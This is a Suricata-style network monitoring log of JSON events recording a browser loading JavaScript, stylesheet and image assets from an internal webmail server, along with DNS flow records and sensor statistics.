{"timestamp":"2020-02-29T00:21:17.462956+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} 
{"timestamp":"2020-02-29T00:21:17.567336+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.567589+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:21:17.569331+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} 
{"timestamp":"2020-02-29T00:21:17.569674+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:21:17.570872+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.572992+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} 
{"timestamp":"2020-02-29T00:21:17.581785+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:21:17.583865+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:21:17.587547+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} 
{"timestamp":"2020-02-29T00:21:17.587865+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:21:17.591276+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:21:17.588965+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:17.589306+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:21:17.591842+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.592157+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} 
{"timestamp":"2020-02-29T00:21:17.596746+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.593362+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:21:17.594219+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.594991+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.595102+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:21:17.595491+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.595752+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.596037+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:21:17.597188+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} {"timestamp":"2020-02-29T00:21:17.599969+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:21:17.616058+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} 
{"timestamp":"2020-02-29T00:21:17.617498+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":7}} {"timestamp":"2020-02-29T00:21:17.617787+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:21:17.641243+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} 
{"timestamp":"2020-02-29T00:21:17.641296+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:21:17.641307+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:21:17.641313+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} 
{"timestamp":"2020-02-29T00:21:18.000736+0000","flow_id":826028198060941,"event_type":"flow","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:17.582541+0000","end":"2020-02-29T00:16:17.690881+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:21.000858+0000","flow_id":553916250233715,"event_type":"flow","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:20.105331+0000","end":"2020-02-29T00:16:20.214280+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:22.000726+0000","flow_id":345374128613512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1903,"bytes_toclient":3289,"start":"2020-02-29T00:20:16.927880+0000","end":"2020-02-29T00:20:21.988124+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:22.598751+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":3}} {"timestamp":"2020-02-29T00:21:22.600626+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} {"timestamp":"2020-02-29T00:21:22.602835+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:22.602932+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":5}} {"timestamp":"2020-02-29T00:21:22.622869+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":8}} 
{"timestamp":"2020-02-29T00:21:23.000179+0000","event_type":"stats","stats":{"uptime":14935,"capture":{"kernel_packets":137495,"kernel_drops":0},"decoder":{"pkts":137587,"bytes":94288945,"invalid":193,"ipv4":136034,"ipv6":10,"ethernet":137587,"raw":0,"null":0,"sll":0,"tcp":130520,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2822,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} 
